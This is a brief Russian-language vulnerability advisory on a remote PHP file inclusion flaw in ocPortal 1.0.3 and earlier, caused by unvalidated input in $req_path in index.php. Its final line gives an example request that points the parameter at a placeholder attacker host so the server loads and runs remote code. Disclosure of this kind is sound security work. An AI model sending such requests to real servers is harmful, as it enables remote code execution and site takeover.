Программа: ocPortal 1.0.3 и более ранние версии
Уязвимость обнаружена в ocPortal. Удаленный атакующий может выполнить произвольный PHP сценарий.
Уязвимость существует из-за некорректной обработки входных данных в переменной $req_path в файле index.php. Удаленный атакующий может в качестве параметра уязвимой переменной указать удаленный файл, который будет выполнен на целевом сервере.
Пример:
http://[target]/ocp-103/index.php?req_path=http://[attacker]/
